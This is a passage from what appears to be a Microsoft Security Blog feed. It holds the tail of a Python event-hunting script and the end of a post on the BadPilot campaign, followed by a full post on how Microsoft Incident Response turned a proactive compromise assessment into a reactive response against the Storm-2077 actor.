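            key = (ev["SrcIpAddr"], ev["DstIpAddr"], ev["Url"], ev["Dvc"])
            hits[key].append(ev["TimeGenerated"])
    return {k: {"first": min(t), "last": max(t), "count": len(t)} for k, t in hits.items()}


if __name__ == "__main__":
    for key, summary in hunt(SAMPLE_EVENTS).items():
        print(key, summary)
```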
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.
The post The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation appeared first on Microsoft Security Blog.
Build a stronger security strategy with proactive and reactive incident response: Cyberattack Series
There are countless statistics about cybercrime, and one of the most impactful concerns threat actors' profits, which continue to increase year over year and are on track to rise from $9.22 trillion in 2024 to $13.82 trillion by 2028.1 If the financial drain caused by threat actors were pooled, it would rank as the third-largest gross domestic product (GDP) by country, behind the number two spot, China, at $18.27 trillion.2
That statistic alone tells us a great deal about the importance of preparedness for a potential cyberattack, which includes a robust incident response plan. To create such a plan, it is critical to understand potential risks, and one of the best ways to do that is to conduct a proactive threat hunt and compromise assessment.
Microsoft Incident Response is made up of highly skilled investigators, researchers, engineers, and analysts who specialize in handling global security incidents. In addition to reactive response, they also conduct proactive compromise assessments to find threat actor activity. They’ll provide recommendations and best practice guidance to strengthen an organization’s security posture.
Microsoft Incident Response compromise assessments use the same methodology and resources as an investigation, but without the time pressure and crisis-driven decision making associated with a live cyberattack. Compromise assessments are often used by those who have had a prior incident and want to measure their security posture after implementing new security measures. Some customers use the service as an annual assessment prior to locking down change controls. Others may use it to assess the environment of an acquisition prior to joining infrastructures.
What happens when a compromise assessment turns into a reactive incident response engagement? Let’s dive into a recent situation where our team encountered this very scenario.
Why differentiate between proactive and reactive investigations?
It is important to understand the key differences between proactive and reactive investigations, as each has different goals and measures for success. Microsoft Incident Response’s proactive compromise assessments are focused on detection and prevention, which includes identifying potential indicators of compromise (IOCs), bringing attention to potential vulnerabilities, and helping customers mitigate risks by implementing security hardening measures.
Our reactive investigations are centered on incident management during and immediately after a compromise, including incident analysis, threat hunting, tactical containment, and Tier 0 recovery, all while under the pressure of an active cyberattack.
Proactive and reactive incident response are essential capabilities of a more robust defense strategy. Together they enable an organization to address an active cyberattack during a period when time and knowing the next steps are critical and, at the same time, give its experts the experience needed to help prevent future incidents. Not all organizations have the resources required to maintain an incident response team capable of both approaches and may want to consider using a third-party service.
The importance of Microsoft’s “double duty” incident response experts
When confronted by an active threat actor, two things are at the forefront of success and can’t be lost: time and knowledge.
While conducting a proactive compromise assessment for a nonprofit organization in mid-2024, Microsoft Incident Response began its forensic investigation. The team initially identified small artifacts of interest, but the assessment quickly changed as suspicious events began to unfold. At the time the threat actor was not known, but it has since been tracked as Storm-2077, a Chinese state actor that has been active since at least January 2024. Storm-2077’s techniques focus on email data theft, using valid credentials harvested from compromised systems. Storm-2077 was lurking in the shadows of the organization’s environment. When they felt they had been detected, these threat actors put their fingers on keyboards and started making moves.
Precious time to remediate was not lost. Microsoft Incident Response immediately switched from proactive to reactive mode. The threat actor created a global administrator account and began disabling legitimate organizational global administrator accounts to gain full control of the environment. The targeted organization’s IT team was already synchronized with Microsoft Incident Response through the active compromise assessment that was taking place. The targeted customer took note of the event and came to Microsoft for deconfliction. Once the activity was determined to be malicious, the organization’s IT team disabled the access, and the proactive incident response investigation converted to being reactive. The threat actor was contained and access was remediated quickly because of this collaboration.
The threat actor had likely been present in the organization’s environment for a few months or more. They had taken advantage of a stolen session token to conduct a token replay attack, and through this had gained access to multiple accounts.
Proactive assessments that don’t utilize reactive investigation teams for delivery may result in a delay in responding or even generate more challenges for the incoming investigation team.
Thankfully, Microsoft Incident Response conducts proactive compromise assessments with the same resources that deliver reactive investigations. They can take immediate action to halt active cyberthreats before they do more harm.
Read the report to go deeper into the details of the cyberattack, including Storm-2077 tactics, the response activity, and lessons that other organizations can learn from this case.
What is the Cyberattack Series?
With our Cyberattack Series, customers will discover how Microsoft Incident Response investigates unique and notable attacks. For each cyberattack story, we will share:
- How the cyberattack happened.
- How the breach was discovered.
- Microsoft’s investigation and eviction of the threat actor.
- Strategies to avoid similar cyberattacks.
To learn more about Microsoft Incident Response capabilities, please visit our website, or reach out to your Microsoft account manager or Premier Support contact.
Download our Unified Security e-book to learn more about how Microsoft can help you be more secure.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
1. Cybercrime Expected To Skyrocket in Coming Years, Statista. February 22, 2024.
2. World GDP Rankings 2024 | Top 10 Countries Ranked By GDP, Forbes India. November 4, 2024.
The post Build a stronger security strategy with proactive and reactive incident response: Cyberattack Series appeared first on Microsoft Security Blog.